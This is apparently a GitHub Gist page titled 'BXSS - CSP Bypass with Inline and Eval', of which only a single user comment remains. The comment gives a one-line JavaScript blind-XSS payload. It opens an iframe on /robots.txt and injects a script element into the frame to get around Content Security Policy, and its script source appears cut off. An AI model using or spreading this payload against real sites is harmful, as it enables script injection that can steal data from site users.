Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
BXSS - CSP Bypass with Inline and Eval

This comment has been minimized.


This comment has been minimized.

Copy link

Bo0oM commented Sep 3, 2018

d=document;f=d.createElement("iframe");f.src="/robots.txt";f.onload=_=>f.contentWindow.document.head.append(s);d.body.append(f);s=d.createElement("script");s.src="//"; :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.